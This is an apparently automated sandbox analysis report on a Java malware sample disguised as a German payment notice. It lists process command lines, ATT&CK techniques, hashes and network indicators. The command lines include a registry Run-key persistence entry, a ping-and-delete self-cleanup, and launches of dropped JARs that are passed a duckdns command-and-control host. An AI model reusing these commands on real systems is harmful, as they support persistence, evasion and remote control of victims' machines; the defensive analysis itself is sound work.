Windows
Analysis Report
Avisierung vom 03.04.2025 Kundennummer 1084472.jar
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- 7za.exe (PID: 7636 cmdline: 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
- conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- java.exe (PID: 7728 cmdline: java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
- conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- icacls.exe (PID: 7816 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
- conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- java.exe (PID: 5540 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
- conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5548 cmdline: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- reg.exe (PID: 7448 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cmd.exe (PID: 5840 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 4692 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
- java.exe (PID: 2964 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
- conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- java.exe (PID: 4860 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
- conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5560 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 8000 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 5868 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 6892 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
tool_paexec_strings | Detects PAExec based on strings | Sekoia.io |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
System Summary |
---|
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
- AV Detection
- Compliance
- Software Vulnerabilities
- Networking
- Key, Mouse, Clipboard, Microphone and Screen Capturing
- System Summary
- Data Obfuscation
- Persistence and Installation Behavior
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
AV Detection |
---|
Source: | Neural Call Log Analysis: |
Source: | Binary string: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | Code function: |
Networking |
---|
Source: | DNS query: |
Source: | Process created: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: |
Source: | Code function: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Persistence and Installation Behavior |
---|
Source: | File created: | |
Source: | File created: | | ||
Source: | File created: | | ||
Source: | File created: | |
Source: | Process created: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Dropped PE file which has not been started: | | ||
Source: | Dropped PE file which has not been started: | | ||
Source: | Dropped PE file which has not been started: | |
Source: | API coverage: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Memory protected: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Masquerading | 21 Input Capture | 1 System Time Discovery | Remote Services | 21 Input Capture | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 Services File Permissions Weakness | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Services File Permissions Weakness | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 11 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Services File Permissions Weakness | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse | ||
11% | ReversingLabs | Binary.Trojan.Generic | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
0% | ReversingLabs | |||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jegjav.duckdns.org | 128.90.145.126 | true | true | unknown | |
ip-api.com | 208.95.112.1 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
false | high | ||
false | unknown | ||
false | high | ||
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false | |
128.90.145.126 | jegjav.duckdns.org | United States | 22363 | PHMGMT-AS1US | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1656232 |
Start date and time: | 2025-04-04 06:59:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 58s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowsfilecookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Run name: | Without Tracing |
Number of analysed new started processes analysed: | 34 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Avisierung vom 03.04.2025 Kundennummer 1084472.jar |
Detection: | MAL |
Classification: | mal84.troj.expl.evad.winJAR@36/25@5/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 4.245.163.56
- Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target java.exe, PID 2964 because it is empty
- Execution Graph export aborted for target java.exe, PID 5540 because it is empty
- Execution Graph export aborted for target java.exe, PID 7728 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing network information.
- Report size getting too big, too many NtSetInformationFile calls found.
- Report size getting too big, too many NtWriteFile calls found.
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 52 |
Entropy (8bit): | 4.834679141051596 |
Encrypted: | false |
SSDEEP: | 3:oFj4I5vpm4USnxkLn:oJ5bnAn |
MD5: | 820A51136103187466669F3549214450 |
SHA1: | F1F6A6F179214713FC76DC87FE7689CDC7352AB2 |
SHA-256: | 70469350DB6EF612513EEF2E2B1E3A4248BBA2160EEFBBE18744AE837B7A297A |
SHA-512: | FEC2CFBD27F5506983CE5FA2EF2E1DF3C314751C28A682BE59DD51C8B0E0ED12E9163950675C23FB263DC9E3737E88DFB3F9D522AE5374C0EC2246AFDE1F92A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2796 |
Entropy (8bit): | 7.74055941239173 |
Encrypted: | false |
SSDEEP: | 48:9DtpMQU//Lm3Bec4NffvnGo1XVN1+w3iEYil/8qzQEr8njBeju6OOPtrFk8kUi1T:tIE3enGo1XV//3miZ0XMnVrq8CAUUEbV |
MD5: | A54F66492FD94668EF51A545D292F0B1 |
SHA1: | 5CA2E82ACD0E62C3C97FD9B16A27DA7FF88B68BA |
SHA-256: | BDC068FBF030308A87B3C9A7FEA487EF12B1DF34290D617CC4B103F1FD7E27C7 |
SHA-512: | 4916264091C45CD95E408EBBC7B08812479A4E77FD3A3036D95351E36516F8465A62089F20869DE89F4B69F9B15F159D27BDB894B4C657C0CAECE4436C64D496 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11108 |
Entropy (8bit): | 7.907426955263712 |
Encrypted: | false |
SSDEEP: | 192:7pawDRaWMYXGm263/+vsm1V9QObYWwevvJbmeU2uDYunhqBHr9t6rSVU1Ls5c5l8:7pawdaWXvWsm1EO8WPBmeUVk7Hrr6rSh |
MD5: | D0A0C0C43784CB4C27038A4A3E23F2BA |
SHA1: | 525C51436633938E49AB44BA9F2BAD9CEAF54C13 |
SHA-256: | DB2C3F5A4745E129B2E4FB90766C4893C7D93423C16A3360797845B77561176F |
SHA-512: | 22A0678ED068A7E3B846EE32CDC9FE6403D2330AEAFF11F68C7BBEAD5A86FB27BBAD5F65E8956FC5E1EB1964AB180270E552F568C85A96053207B5A184589D98 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2662 |
Entropy (8bit): | 7.74777446023506 |
Encrypted: | false |
SSDEEP: | 48:9XYe5NKxPuHiPLDgDK0DP7bLQbb+NSC0u4+jcefSHQ++P7qYZKppk6gc:r5kkuLyZn83fu44NZJP7jZKk6gc |
MD5: | 7FC5D32903CCFB588148C41481292EEA |
SHA1: | 098C980CB39F5DE6535D3E5339DEF97157DB8735 |
SHA-256: | DDFAFE23DB3BC32D6F53B255FDCE6A0A7815146D163D4C00A0F4A15EAFEF82FF |
SHA-512: | 43FA783F6A2783ECE97FF6337068C823DC0E75FDCD45988BE5C5656D72F5D3BF9FC95B79CE2D9AABCF8167F1EBED41A3559983B79F8B5827B41DFEF93CF69FFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.275778370270322 |
Encrypted: | false |
SSDEEP: | 96:wjPrtU8Gd8XomS6rnI28Ij/STLHG1bowmb:wju8Gd8XomS6oI+XHGd |
MD5: | 1B44B5CD529382D3702BF106E2C94D10 |
SHA1: | 6AA8BE28C7D09E731C3150473697A219A633067D |
SHA-256: | 397D951B3E851FDE2616F8A7DF6FEA2BD9E6396711507714B8515FA6243BD3BC |
SHA-512: | AE11B3D253ADBD904BBCF9633D790580FC24352CA53DC43362F4007A3A086B2EABA2AF7634058F8D0C7A585769FEC95E31BDF0BC8FB0D2E317879C538AD47401 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2802310005980957 |
Encrypted: | false |
SSDEEP: | 96:IpxrzX8GEZDYv655tq6rgTI28InaFSTgHG1bow75:IpJ8GgYva5tq6hIrEHGd |
MD5: | E2AAEF9EA57694E080487A163ED3D944 |
SHA1: | DC64DB92B36ED0AE772E0C540B94CF30C1A47C2A |
SHA-256: | E95CBCDF1248BFB7171E4BF4A4B8D9F249E12971DCDF95DEFBF2CCD5222ACF72 |
SHA-512: | 995AE34A48F5255C97A1AAEC37F2AAA31CA6157402E81A55594EB66A760D995EE0793C9FF191EA18304A9AB15358E3173B218A57F100848AF8D0A42BECA14F23 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2795675974819485 |
Encrypted: | false |
SSDEEP: | 96:ajPrCGs8GrSgqy0xY6rII28IO/STePHG1bowGZy:aj28Ge7y0xY6hIJQHGd |
MD5: | E9D97C416B7FB1CF248CA0612E06965E |
SHA1: | 605AFE3FA28E7E6555BC2659243820B661AF629D |
SHA-256: | 3C7F1B31E26C7E11CC321B6C5F9FEDA9E86E95C03FDA2C6063C359285F1E95A3 |
SHA-512: | E21FB30D692475ED785A7E8C7221801306A16FD4287D350D859AD80EBE92D2D38C853560E078774704E0F2AE96645DB3636C891AA9A96CE89C21B197A23654B1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2962891498247433 |
Encrypted: | false |
SSDEEP: | 96:2Dor9c78GnqZQCOxtUkJdIoqu1oUl47TOaHG1bow+4cp:2DT8GnqZQC2nzITmoUGLHGdQ |
MD5: | 7A72874EE72073E2859F9BA44B12A38D |
SHA1: | B3543928B3F0378B5CA68D263ECDF817479BF1F6 |
SHA-256: | 37D304436B5C7F49763DD3D1F419E79CBAA7F1743A2D556EFAD80400DDD8931C |
SHA-512: | D90AB8D5B1820906C907B2002D272949AD35D13F6161D81A221667728AE36EC6E2FDBF006F3F9A9BD23C0DACA216F4D50126F3B66C8F6445DF997C6E3D6D07EB |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1506993 |
Entropy (8bit): | 7.990710311197979 |
Encrypted: | true |
SSDEEP: | 24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6 |
MD5: | ACFB5B5FD9EE10BF69497792FD469F85 |
SHA1: | 0E0845217C4907822403912AD6828D8E0B256208 |
SHA-256: | B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E |
SHA-512: | E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
